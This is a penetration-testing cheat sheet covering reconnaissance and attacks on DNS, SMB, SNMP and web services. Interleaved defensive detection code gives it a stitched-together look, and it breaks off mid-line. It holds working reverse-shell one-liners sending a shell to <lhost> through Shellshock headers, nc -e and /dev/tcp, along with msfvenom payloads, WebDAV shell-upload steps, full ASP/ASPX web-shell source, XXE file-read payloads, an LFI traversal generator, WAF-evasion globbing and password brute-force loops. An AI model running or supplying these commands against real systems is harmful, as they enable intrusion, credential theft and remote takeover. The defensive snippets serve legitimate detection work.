Miscellaneous Snippets


Collection of references, commands, scripts, and tool usage examples for various things.

References

ISO
OWASP cheatsheetseries
OWASP Top 10
PTES
SANS
NIST
COBIT
SABSA
TOGAF
ITIL


OSINT

awesome-osint
theHarvester
Shodan
Google Hacking Database
Censys
spiderfoot
gitrob
maltego/casefile
recon-ng
discover.sh


General

Backup Files


bfac

bfac --url http://<rhost>/<target-file>

fuzzx

python fuzzx.py http://<rhost>/<target-file>


Crypto


CyberChef
dCode
esolangs
RsaCtfTool
DTMF decoder

Curl


curl -i <rhost>

curl <rhost>/robots.txt -s | html2text
curl <rhost>/README.md -s | html2text

curl <rhost> -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//'
curl <rhost> -s -L | grep '<!--.*-->' | sed -e 's/^[[:space:]]*//'
curl <rhost> -s -L |sed -n '/<!--/,/-->/p'


DNS


dig axfr @<rhost> <domain>  
dig @<rhost> -x <rhost>

dig @<rhost> <domain> mx
dig @<rhost> <domain> ns

dig @<rhost> <domain> ALL
dig axfr <domain> @<rhost>
dig txt _dmarc.<domain>

host -l <domain> <rhost>

nslookup 
> set querytype=any
> <domain>

nslookup -type=txt <domain>

nmap --script dns-srv-enum --script-args dns-srv-enum.domain=<domain>

dnsenum <domain> 
dnsenum -p 5 -s 20 <domain> 
dnsenum -f subdomainslist.txt <domain>
dnsenum --enum <domain>

dnsrecon -d <domain> -t axfr 
dnsrecon -d <domain> -D /usr/share/wordlists/dnsmap.txt -t std --xml output.xml   // brute
dnsrecon -t std -d <domain>

dnstracer -r 3 -v example.com 

dmitry -wins output.txt <domain> 


Common Record Types


Record Description
A Host address
AAAA IPv6 host address
ALIAS Auto resolved alias
CNAME Canonical name for an alias
MX Mail eXchange
NS Name Server
PTR Pointer
SOA Start Of Authority
SRV location of service
TXT Descriptive text


DNSSEC Record Types


Record Description
DNSKEY DNSSEC public key
DS Delegation Signer
NSEC Next Secure
NSEC3 Next Secure v. 3
NSEC3PARAM NSEC3 Parameters
RRSIG RRset Signature


Less common Record Types


Record Description
AFSDB AFS Data Base location
ATMA Asynchronous Transfer Mode address
CAA Certification Authority Authorization
CERT Certificate / CRL
DHCID DHCP Information
DNAME Non-Terminal DNS Name Redirection
HINFO Host information
ISDN ISDN address
LOC Location information
MB, MG, MINFO, MR mailbox records
NAPTR Naming Authority Pointer
NSAP NSAP address
RP Responsible person
RT Route through
TLSA Transport Layer Security Authentication
X25 X.25 PSDN address

For a more detailed explanation of each record type, credit goes to dns-record-types by Simple DNS.


SubDomains


There are now many quality subdomain enumeration tools, for example:

amass
findomain
all.txt

wfuzz -w /root/SecLists/Discovery/DNS/subdomains-top1mil-5000.txt -u domain.htb -H "Host:FUZZ.domain.htb"   // HTB 


.DS_Store


ds_store_exp
ds_storescanner

python ds_store_exp.py http://<rhost>/.DS_Store


Emails


scrapemail

python scrapemail.py -url http://<rhost>/
python scrapemail.py -ulist <url-file>


Evil-WinRAR


Evil-WinRAR-Gen

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<lhost> LPORT=<lport> -f exe > shell.exe

touch winrar.txt
./evilWinRAR.py -e shell.exe -g winrar.txt


Finger


finger-user-enum.pl

finger <user>@<rhost>

./finger-user-enum.pl -U <username-list> -t <rhost>


Gobuster Wordlists


/usr/share/wordlists/dirb/common.txt
/usr/share/wordlists/dirb/big.txt
/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt 
/root/SecLists/Discovery/Web-Content/common.txt 
/root/SecLists/Discovery/Web-Content/RobotsDisallowed-Top1000.txt
/root/SecLists/Discovery/Web-Content/CGIs.txt
/root/SecLists/Discovery/Web-Content/Logins.fuzz.txt
/root/SecLists/Discovery/Web-Content/raft*


HTTP Request Methods


Method Description
GET The GET method requests a representation of the specified resource. Requests using GET should only retrieve data.
HEAD The HEAD method asks for a response identical to that of a GET request, but without the response body.
POST The POST method is used to submit an entity to the specified resource, often causing a change in state or side effects on the server.
PUT The PUT method replaces all current representations of the target resource with the request payload.
DELETE The DELETE method deletes the specified resource.
CONNECT The CONNECT method establishes a tunnel to the server identified by the target resource.
OPTIONS The OPTIONS method is used to describe the communication options for the target resource.
TRACE The TRACE method performs a message loop-back test along the path to the target resource.
PATCH The PATCH method is used to apply partial modifications to a resource.


HTTPS / SSL


testssl.sh

nmap -sV -Pn -vv -p 443 --script=ssl-ccs-injection,ssl-cert-intaddr,ssl-cert,ssl-date,ssl-dh-params,ssl-enum-ciphers,ssl-heartbleed,ssl-known-key,ssl-poodle,sslv2-drown,sslv2 <rhost>

sslyze --regular <rhost>

./testssl.sh <rhost>
./testssl.sh -e -E -f -p -y -Y -S -P -c -H -U <rhost>

python heartbleed.py <rhost>   


IIS Shortname


IIS_shortname_Scanner

python iis_shortname_Scan.py http://<rhost>/dir/


Java Deserialization


ysoserial

java -jar ysoserial.jar <payload> <command>


JSON Attacks


Attacking JSON Application - websecgeeks
JSON Deserialization Attacks
Munoz-Friday-The-13th-Json-Attacks
Munoz-Friday-The-13th-Json-Attacks 2


Json.Net Deserialization


ysoserial.net

ysoserial.exe -f <formatter> -g <gadget> -o <output> -c <command>
ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "certutil.exe -urlcache..."

{
    '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
    'MethodName':'Start',
    'MethodParameters':{
        '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
        '$values':['cmd','/c certutil.exe -urlcache...']
    },
    'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}
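A defender-side check for the payload shape shown above, added here as an example and not taken from the original page or from ysoserial.net: it walks an inbound JSON body and reports every client-supplied "$type" hint. The sample body is the ObjectDataProvider document above re-quoted with double quotes (Python's json module does not accept Json.NET's single-quoted strings) and with the command replaced by a placeholder; the field names and type names are as they appear on the page.

```python
import json

# Constructed sample: the ObjectDataProvider payload above, double-quoted and
# with the command argument replaced by a "<command>" placeholder.
SAMPLE_BODY = """
{
    "$type": "System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName": "Start",
    "MethodParameters": {
        "$type": "System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "$values": ["cmd", "/c <command>"]
    },
    "ObjectInstance": {"$type": "System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"}
}
"""


def type_hints(node, path="$"):
    """Return (json-path, type name) for every "$type" key in a parsed document."""
    hits = []
    if isinstance(node, dict):
        hint = node.get("$type")
        if isinstance(hint, str):
            # keep the type name only, dropping the assembly qualification
            hits.append((path, hint.split(",")[0].strip()))
        for key, value in node.items():
            hits.extend(type_hints(value, f"{path}.{key}"))
    elif isinstance(node, list):
        for index, value in enumerate(node):
            hits.extend(type_hints(value, f"{path}[{index}]"))
    return hits


def inspect_body(body: str) -> dict:
    """Parse an inbound JSON body and decide whether to reject it.

    A browser or API client has no reason to send "$type"; any occurrence is
    enough to refuse the request before it reaches the deserializer.
    """
    try:
        document = json.loads(body)
    except json.JSONDecodeError:
        return {"reject": True, "reason": "malformed JSON", "hints": []}
    hints = type_hints(document)
    return {
        "reject": bool(hints),
        "reason": "client-supplied $type" if hints else "",
        "hints": hints,
    }


if __name__ == "__main__":
    for path, type_name in inspect_body(SAMPLE_BODY)["hints"]:
        print(f"{path}: {type_name}")
```

The edge check only buys time: the actual fix is server-side, keeping Json.NET's TypeNameHandling at its default of None, or, where polymorphic deserialization is genuinely needed, a SerializationBinder that allows an explicit list of types and nothing else.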


JSON Web Tokens


JWT.IO allows you to decode, verify and generate JWT.

JWT.io


LFI


sensitive-files

python lfigen.py /etc/passwd
#!/usr/bin/env python3
import sys

if len(sys.argv) != 2:
    print("usage: lfigen.py <file>")
    sys.exit(1)

f = sys.argv[1]

# "../" traversal: plain, then with %00 and "?" truncation suffixes
plain = [f] + ["../" * i + ".." + f for i in range(9)]
for suffix in ("", "%00", "?"):
    for p in plain:
        print(p + suffix)

# "....//" variants, aimed at filters that strip "../" once
for i in range(10):
    print("....//" * i + "..../" + f)

# backslash-encoded ("%5C") traversal
for i in range(1, 11):
    print("/%5C.." * i + f)

# percent-encoded dots ("%2e%2e")
for i in range(1, 11):
    print("/".join(["%2e%2e"] * i) + f)
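The generator above is only half the picture. The following Python, added here as an example and not part of the original page, shows the server-side check that survives those payload families: a naive "../"-stripping filter (vulnerable_resolve, the kind of filter the "....//" family is built to defeat) next to a resolver that percent-decodes first and normalises afterwards (safe_resolve). The base directory and request paths are constructed for the demonstration.

```python
import posixpath
from urllib.parse import unquote


def decode_repeatedly(value: str, rounds: int = 3) -> str:
    """Undo percent-encoding until stable, so %252e (double-encoded '.') is seen as '.'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def naive_filter(user_path: str) -> str:
    """Vulnerable: a blacklist that strips '../' once. '....//' collapses to '../'."""
    return user_path.replace("../", "")


def vulnerable_resolve(base_dir: str, user_path: str) -> str:
    """Path the naive filter would hand to the file system."""
    return posixpath.normpath(posixpath.join(base_dir, naive_filter(user_path)))


def safe_resolve(base_dir: str, user_path: str):
    """Return the file path under base_dir, or None if the request must be refused.

    Order matters: decode, then reject NUL, then fold backslashes, then
    normalise, then check the result. No pattern stripping is done at all.
    """
    p = decode_repeatedly(user_path)
    if "\x00" in p:                  # the %00 truncation family
        return None
    p = p.replace("\\", "/")         # the %5C family
    if p.startswith("/"):            # absolute paths are never user-chosen
        return None
    norm = posixpath.normpath(p)
    if norm == "." or norm == ".." or norm.startswith("../"):
        return None
    return posixpath.join(base_dir, norm)


if __name__ == "__main__":
    base = "/var/www/files"  # constructed document root
    for probe in ("....//....//....//etc/passwd", "%2e%2e/%2e%2e/%2e%2e/etc/passwd",
                  "../../../etc/passwd%00", "/%5C../%5C../etc/passwd", "reports/2024/../summary.pdf"):
        print(f"{probe!r:45} naive={vulnerable_resolve(base, probe)!r:30} safe={safe_resolve(base, probe)!r}")
```

safe_resolve deliberately leaves the "...." components alone: they become a literal directory name under the document root that does not exist, which is the correct outcome, whereas the naive filter rewrites them into real traversal.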


Magic Bytes


Magic Bytes - List of file signatures

Executable Binaries   Mnemonic          Signature
DOS Executable        “MZ”              4D 5A
ELF Executable        “.ELF”            7F 45 4C 46


Image File Formats    Mnemonic          Signature
PNG Image             “.PNG….”          89 50 4E 47 0D 0A 1A 0A
GIF Image             “GIF87a”          47 49 46 38 37 61
                      “GIF89a”          47 49 46 38 39 61
JPEG Image            “ÿØÿÛ”            FF D8 FF DB
                      “ÿØÿà..JFIF..”    FF D8 FF E0 00 10 4A 46 49 46 00 01
                      “ÿØÿî”            FF D8 FF EE
                      “ÿØÿá..Exif..”    FF D8 FF E1 ?? ?? 45 78 69 66 00 00
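As an added example (not code from the original page), the signatures in the table above put to their defensive use: identifying what a file really is from its leading bytes and refusing an upload whose content does not match its claimed extension. The wildcard bytes ("??") are honoured, the sample byte strings are constructed, and the extension-to-family mapping is an assumption chosen for an image-only upload endpoint.

```python
import os

# Signatures from the table above; None stands for a wildcard byte ("??").
SIGNATURES = [
    ("DOS/PE executable", [0x4D, 0x5A]),
    ("ELF executable", [0x7F, 0x45, 0x4C, 0x46]),
    ("PNG image", [0x89, 0x50, 0x4E, 0x47, 0x0D, 0x0A, 0x1A, 0x0A]),
    ("GIF image 87a", [0x47, 0x49, 0x46, 0x38, 0x37, 0x61]),
    ("GIF image 89a", [0x47, 0x49, 0x46, 0x38, 0x39, 0x61]),
    ("JPEG image raw", [0xFF, 0xD8, 0xFF, 0xDB]),
    ("JPEG image JFIF", [0xFF, 0xD8, 0xFF, 0xE0, 0x00, 0x10, 0x4A, 0x46, 0x49, 0x46, 0x00, 0x01]),
    ("JPEG image EE", [0xFF, 0xD8, 0xFF, 0xEE]),
    ("JPEG image Exif", [0xFF, 0xD8, 0xFF, 0xE1, None, None, 0x45, 0x78, 0x69, 0x66, 0x00, 0x00]),
]

# Assumed policy: content families an image upload endpoint will store, by extension.
ALLOWED_BY_EXTENSION = {
    ".png": "PNG image",
    ".gif": "GIF image",
    ".jpg": "JPEG image",
    ".jpeg": "JPEG image",
}


def identify(data: bytes):
    """Return the label of the first signature matching the start of data, else None."""
    for label, sig in SIGNATURES:
        if len(data) >= len(sig) and all(s is None or s == b for s, b in zip(sig, data)):
            return label
    return None


def check_upload(filename: str, data: bytes):
    """(accepted, reason): the extension must be allowed and the bytes must agree with it."""
    ext = os.path.splitext(filename)[1].lower()
    family = ALLOWED_BY_EXTENSION.get(ext)
    if family is None:
        return False, f"extension {ext or '(none)'} not allowed"
    label = identify(data)
    if label is None:
        return False, "no known signature"
    if not label.startswith(family):
        return False, f"content is {label}, not {family}"
    return True, label


# Constructed sample headers; only the leading bytes matter for the check.
SAMPLES = {
    "setup.exe": b"MZ\x90\x00\x03\x00\x00\x00",
    "a.out": b"\x7fELF\x02\x01\x01\x00",
    "logo.png": b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR",
    "anim.gif": b"GIF89a\x10\x00\x10\x00",
    "photo.jpg": b"\xff\xd8\xff\xe1\x12\x34Exif\x00\x00",
    "avatar.png": b"MZ\x90\x00\x03\x00\x00\x00",   # an executable renamed to .png
}

if __name__ == "__main__":
    for name, head in SAMPLES.items():
        print(f"{name:12} {identify(head)!s:20} upload: {check_upload(name, head)}")
```

Signature checks are necessary but not sufficient: a polyglot can carry a valid image header in front of other content, so the server must also never execute or serve uploaded files from a location where their extension is interpreted.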


Mail


smtp-user-enum -M VRFY -U <userlist> -t <rhost>
smtp-user-enum -M EXPN -U <userlist> -t <rhost>
#!/usr/bin/env python3
import socket
import sys

if len(sys.argv) != 2:
    print("usage: vrfy.py <username>")
    sys.exit(0)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('<rhost>', 25))          # <rhost>: mail server placeholder
banner = s.recv(1024)
print(banner.decode(errors='replace'))
s.send(('VRFY ' + sys.argv[1] + '\r\n').encode())
result = s.recv(1024)
print(result.decode(errors='replace'))
s.close()


POP3

Command Comment
USER Your user name for this mail server
PASS Your password.
QUIT End your session.
STAT Number and total size of all messages
LIST Message# and size of message
RETR message# Retrieve selected message
DELE message# Delete selected message
NOOP No-op. Keeps your connection open.
RSET Reset the mailbox. Undelete deleted messages.


SMTP

Command Comment
HELO It’s the first SMTP command: it starts the conversation, identifying the sender server, and is generally followed by its domain name.
EHLO An alternative command to start the conversation, signalling that the server is using the Extended SMTP protocol.
MAIL FROM With this SMTP command the operations begin: the sender states the source email address in the “From” field and actually starts the email transfer.
RCPT TO It identifies the recipient of the email; if there are more than one, the command is simply repeated address by address.
SIZE This SMTP command informs the remote server about the estimated size (in terms of bytes) of the attached email. It can also be used to report the maximum size of a message to be accepted by the server.
DATA With the DATA command the email content begins to be transferred; it’s generally followed by a 354 reply code given by the server, giving the permission to start the actual transmission.
VRFY The server is asked to verify whether a particular email address or username actually exists.
TURN This command is used to invert roles between the client and the server, without the need to open a new connection.
AUTH With the AUTH command, the client authenticates itself to the server, giving its username and password. It’s another layer of security to guarantee a proper transmission.
RSET It communicates the server that the ongoing email transmission is going to be terminated, though the SMTP conversation won’t be closed (like in the case of QUIT).
EXPN This SMTP command asks for a confirmation about the identification of a mailing list.
HELP It’s a client’s request for information that can be useful for a successful transfer of the email.
QUIT It terminates the SMTP conversation.
MAIL Defines source email address
BDAT Signifies that binary data will follow


Networking


Windows

1) Windows + R

2) ncpa.cpl    // run

3) Right click Ethernet -> Properties 

4) Select Internet Protocol Version 4 (TCP/IPv4) -> Properties 

5) Enter IP and DNS server:

	Use the following IP address: <...>


	Use the following DNS server addresses: <...>

Linux

ipcalc xx.xx.xx.xx

ifconfig <iface> xx.xx.xx.xx
ifconfig <iface> xx.xx.xx.xx/24   
ifconfig <iface> xx.xx.xx.xx netmask 255.xx.xx.xx 

echo nameserver xx.xx.xx.xx > /etc/resolv.conf


NFS


showmount -e <rhost>

mkdir /tmp/mnt
mount <rhost>:/<rdir> /tmp/mnt

mount -t nfs <rhost>:/<rdir> /tmp/mnt -o nolock


Nmap


nmap -sT -p- --min-rate 5000 --max-retries 2 <rhost>
nmap -sC -sV -T4 <rhost>

ports=$(nmap -p- --min-rate=1000 -T4 <rhost> | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//); nmap -p$ports -sC -sV <rhost>


Oracle


odat.py

oscanner -s <rhost> -P <rport>

./odat.py sidguesser -s <rhost>

use auxiliary/admin/oracle/sid_brute  
use auxiliary/admin/oracle/sid_enum  

tnscmd10g version -h <rhost>


Padbusting


PadBuster

padbuster http://<rhost>/login.php <cookievalue> 8 --cookies <param>=<cookievalue> --encoding 0
padbuster http://<rhost>/login.php <cookievalue> 8 --cookies <param>=<cookievalue> --encoding 0 -plaintext  '<p>=<v>' 


RDP


pth-remote-desktop

apt-get update
apt-get install freerdp-x11

xfreerdp /u:<username> /pth:<hash> /v:<rhost>
xfreerdp -u <username> -p <password> <rhost>


reGeorg


reGeorg

1) Upload tunnel.(aspx|ashx|jsp|php) to a webserver 

2) Configure your tools to use a SOCKS proxy, using the IP address and port you specified when you started reGeorgSocksProxy.py 

python reGeorgSocksProxy.py -p <port> -u http://<rhost>/<uploaded-tunnel>
proxychains <command>


RPC


rpcclient <rhost> -U "" -N
rpcinfo -p <rhost>
rpcdump <rhost>  -v


Rsync


rsync-man-pages
pentesting-rsync

rsync --list-only -a rsync://<rhost>:<port> 
rsync -avz rsync://<rhost>:<port>/etc /root/download/etc

/etc/rsync.conf 

for word in $(cat /root/SecLists/Passwords/Leaked-Databases/rockyou-10.txt ); do sshpass -p $word rsync -6 -r rsync://<user>@<rhost>:<port>/module/ .; done 

rsync -av rsync://<user>@<rhost>/<module> <module> --port <port> --password-file=/root/rockyou.txt


Shellshock


shocker

python shocker.py -H <rhost> --command "/bin/cat /etc/passwd" -c /cgi-bin/shellshock.sh --verbose 
python shocker.py -H <rhost> --command "/bin/bash -i > /dev/tcp/<lhost>/<lport> 0<&1 2>&1" -c /cgi-bin/shellshock.sh 

User-Agent: () { :; }; bash -i >& /dev/tcp/<lhost>/<lport> 0>&1
User-Agent: () { :; }; /usr/bin/nc <lhost> <lport> -e /bin/sh
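The two User-Agent lines above are what the bash function-definition bug looks like on the wire; the Python below, added here as an example that is not part of the original page, is the matching detection: it checks every request header (CGI exports each one as an environment variable, so Cookie, Referer and the rest are as relevant as User-Agent) for the "() { ... };" prologue. The sample requests are constructed and use benign commands.

```python
import re

# The bash function-definition prologue: "() {", a body, "}", then ";" and a
# trailing command. Whitespace inside the prologue varies between probes.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")

# Constructed sample requests: header name -> value.
SAMPLE_REQUESTS = [
    {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/60.0",
     "Referer": "http://example.test/"},
    {"User-Agent": "() { :; }; echo vulnerable", "Accept": "*/*"},
    {"User-Agent": "curl/7.58.0", "Cookie": "() {:;}; /usr/bin/id"},
    {"User-Agent": "() { :;}; /bin/cat /etc/passwd", "Host": "example.test"},
]


def shellshock_headers(headers: dict) -> list:
    """Names of headers whose value carries the Shellshock prologue."""
    return [name for name, value in headers.items() if SHELLSHOCK_RE.search(value)]


def triage(requests: list) -> dict:
    """Map request index -> offending header names, for every request that should be flagged."""
    flagged = {}
    for index, headers in enumerate(requests):
        hits = shellshock_headers(headers)
        if hits:
            flagged[index] = hits
    return flagged


if __name__ == "__main__":
    for index, hits in triage(SAMPLE_REQUESTS).items():
        print(f"request {index}: shellshock pattern in {', '.join(hits)}")
```

Detection of this kind belongs in a WAF or IDS rule; the fix itself is patching bash on the hosts that run CGI, since the pattern can be padded or split in ways a single regex will not keep up with.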


SMB


Impacket
stealing hashes
capture ntlm hashes
smb-share-scf-file-attacks

enum4linux -a <rhost>

nbtscan <rhost>
nmblookup -A <rhost>
nbtstat -a <rhost>

samrdump.py <rhost>

smbmap -H <rhost> -u anonymous
nullinux -all <rhost>

smbclient //<rhost>/<share> -U " "%" "


auxiliary/admin/smb/samba_symlink_traversal
smb> symlink / rootfs
smb> cd rootfs
smb> symlink ../../../../../../../../../../foobar
smb> cd foobar  


responder -I <interface>

// save and upload as @hash.scf
[Shell]
Command=2
IconFile=\\<lhost>\share\hash.ico
[Taskbar]
Command=ToggleDesktop
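The SCF file above works because Explorer fetches IconFile from the UNC path it names. As an added example that is not part of the original page, here is the scanner a share administrator would run over uploaded files: it parses the .scf contents and flags any whose icon is served from a host outside an allow list. The sample files and the allow list are constructed; the IP address is from a documentation range.

```python
import re

# Constructed sample files as they might be found on a writable share.
SAMPLE_FILES = {
    "@hash.scf": "[Shell]\r\nCommand=2\r\nIconFile=\\\\203.0.113.10\\share\\hash.ico\r\n"
                 "[Taskbar]\r\nCommand=ToggleDesktop\r\n",
    "Printers.scf": "[Shell]\r\nCommand=2\r\nIconFile=%SystemRoot%\\system32\\SHELL32.dll,16\r\n"
                    "[Taskbar]\r\nCommand=ToggleDesktop\r\n",
    "budget.xlsx": "not an scf file",
}

# \\host\share\... : capture the host component of a UNC path.
UNC_RE = re.compile(r"^\\\\([^\\]+)\\")


def parse_scf(text: str) -> dict:
    """Minimal INI reader: {section: {key: value}} with case-insensitive names."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][key.strip().lower()] = value.strip()
    return sections


def icon_host(text: str):
    """Host named by IconFile when it is a UNC path, else None (local icons are fine)."""
    icon = parse_scf(text).get("shell", {}).get("iconfile", "")
    match = UNC_RE.match(icon)
    return match.group(1) if match else None


def scan_share(files: dict, trusted_hosts: set) -> list:
    """Names of .scf files whose icon would be fetched from an untrusted host."""
    flagged = []
    for name, content in files.items():
        if not name.lower().endswith(".scf"):
            continue
        host = icon_host(content)
        if host is not None and host.lower() not in {h.lower() for h in trusted_hosts}:
            flagged.append(name)
    return flagged


if __name__ == "__main__":
    print(scan_share(SAMPLE_FILES, {"fileserver01"}))
```

Scanning catches the file after the fact; the controls that stop the hash from leaving are blocking outbound SMB at the perimeter and not allowing .scf files to be written to shares that other users browse.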


SNMP


snmpenum.pl

nmap -sV -Pn -vv -p 161 --script=snmp-info,snmp-win32-users,snmp-processes,snmp-win32-services,snmp-win32-software,snmp-win32-shares <rhost> 

auxiliary/scanner/snmp/snmp_enumusers

snmpwalk -c <community> -v1 <rhost> 1
snmpcheck -t <rhost> -c <community>
snmpenum -t <rhost>
onesixtyone -c <community> -i <rhost>

./snmpenum.pl <rhost> public linux.txt
./snmpenum.pl <rhost> public windows.txt

Enumerate MIB:
****************************************
1.3.6.1.2.1.25.1.6.0    System Processes
1.3.6.1.2.1.25.4.2.1.2  Running Programs
1.3.6.1.2.1.25.4.2.1.4  Processes Path
1.3.6.1.2.1.25.2.3.1.4  Storage Units
1.3.6.1.2.1.25.6.3.1.2  Software Name
1.3.6.1.4.1.77.1.2.25   User Accounts
1.3.6.1.2.1.6.13.1.3    TCP Local Ports
****************************************

snmpwalk -c <community> -v1 <rhost> <MIB>


Stego


stego-toolkit
StegCracker

strings <file>

binwalk <file>
binwalk -e <file>

exiftool <file>
exiv2 <file>

foremost -i <file>

steghide info <file>
steghide extract -sf <file>

pngcheck <file>

zsteg -a <file>
zsteg -E <file>


WAF - Globbing


WAF evasion 1
WAF evasion 2
WAF evasion 3

Standard: 		/bin/nc myip 1337 
Evasion:			/???/n? 2130706433 1337 
Used chars: 		/ ? n [0-9]

Standard: 		/bin/cat /etc/passwd
Evasion: 			/???/??t /???/??ss??
Used chars: 		/ ? t s


Web Dav


davtest -url http://<rhost>/
davtest -url http://<rhost>/<dir>


1)
--------------------------------------------------------------------------------------------
msfvenom -p php/meterpreter/reverse_tcp lhost=<lhost> lport=<lport> -f raw > shell.php

curl http://<rhost>/dav/ --upload-file /root/shell.php

./handler.sh windows/meterpreter/reverse_tcp <lhost> <lport>
curl http://<rhost>/dav/shell.php


2)
--------------------------------------------------------------------------------------------
msfvenom -p php/meterpreter/reverse_tcp lhost=<lhost> lport=<lport> -f raw > shell.php

cadaver http://<rhost>/dav 
dav:/>put shell.php
dav:/>exit

./handler.sh windows/meterpreter/reverse_tcp <lhost> <lport>
curl http://<rhost>/dav/shell.php


3)
--------------------------------------------------------------------------------------------
msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=443 -f asp > aspshell.txt

cadaver http://<rhost>/dav
dav:/>put /root/aspshell.txt
dav:/>copy aspshell.txt aspshellnew.asp;.txt
dav:/>exit

./handler.sh windows/meterpreter/reverse_tcp <lhost> <lport>
curl http://<rhost>/dav/aspshellnew.asp;.txt  


Webmin


ExploitDB-2017

perl webmin.pl <rhost> 10000 <target-file>
auxiliary/admin/webmin/file_disclosure

curl http://<rhost>:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd 


Web Shells


WhiteWinterWolf
phpbash
p0wny-shell

root@kali:/usr/share/webshells# tree
.
├── asp
│   ├── cmd-asp-5.1.asp
│   └── cmdasp.asp
├── aspx
│   └── cmdasp.aspx
├── cfm
│   └── cfexec.cfm
├── jsp
│   ├── cmdjsp.jsp
│   └── jsp-reverse.jsp
├── perl
│   ├── perlcmd.cgi
│   └── perl-reverse-shell.pl
└── php
    ├── findsock.c
    ├── php-backdoor.php
    ├── php-findsock-shell.php
    ├── php-reverse-shell.php
    ├── qsd-php-backdoor.php
    └── simple-backdoor.php

ASPX

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />         
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")

Function getCommandOutput(theCommand)

    Dim objShell, objCmdExec
    Set objShell = CreateObject("WScript.Shell")
    Set objCmdExec = objshell.exec(thecommand)
    getCommandOutput = objCmdExec.StdOut.ReadAll

end Function

%>


<HTML>
<BODY>
<FORM action="" method="GET">
<input type="text" name="cmd" size=45 value="<%= szCMD %>">
<input type="submit" value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<%Response.Write(Request.ServerVariables("server_name"))%>
<p>
<b>The server's port:</b>
<%Response.Write(Request.ServerVariables("server_port"))%>
</p>
<p>
<b>The server's software:</b>
<%Response.Write(Request.ServerVariables("server_software"))%>
</p>
<p>
<b>The server's local address:</b>
<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
<% szCMD = request("cmd")
thisDir = getCommandOutput("cmd /c" & szCMD)
Response.Write(thisDir)%>
</p>
<br>
</BODY>
</HTML>
<%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%>

Weevely

weevely generate Sh3ll            // generate password 'Sh3ll' protected PHP backdoor
weevely http://<rhost>/path/to/upload/shell.php Sh3ll  // trigger shell
...
weevely> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)


Wordlists / Creation


SecLists
Leaked-Databases
rockyou.txt

cewl <url> -w outfilewordlist.txt
cewl <url> -m 6 -w outfilewordlist.txt

python cupp.py -pw profiler   

twofi -m 6 -u @target > wordlist_target.txt  

Wordhound 
Brutescrape  
crunch


XXE


XXE Injection

<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><root>&test;</root>
<?xml version="1.0" encoding="ISO-8859-1"?>
    <!DOCTYPE foo [
    <!ELEMENT foo ANY >
    <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
    <Content>    
	<Author>&xxe;</Author>
	<Subject>exploit</Subject>
     </Content>
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE hack [<!ENTITY xxe SYSTEM "http://<lhost>/shell.php" >]>
<foo>&xxe;</foo>
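All three payloads above depend on the parser honouring a DTD. As an added example that is not part of the original page, the Python below applies the simplest effective control: refuse any untrusted document that declares a DOCTYPE or ENTITY before it ever reaches the XML parser, then parse only what is left. The sample documents are constructed from the first two payloads above plus a clean one.

```python
import re
import xml.etree.ElementTree as ET

# Constructed samples: the first two payloads above, and a clean document.
EXTERNAL_ENTITY = ('<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM '
                   "'file:///etc/passwd'>]><root>&test;</root>")
NESTED_ENTITY = ('<?xml version="1.0" encoding="ISO-8859-1"?>'
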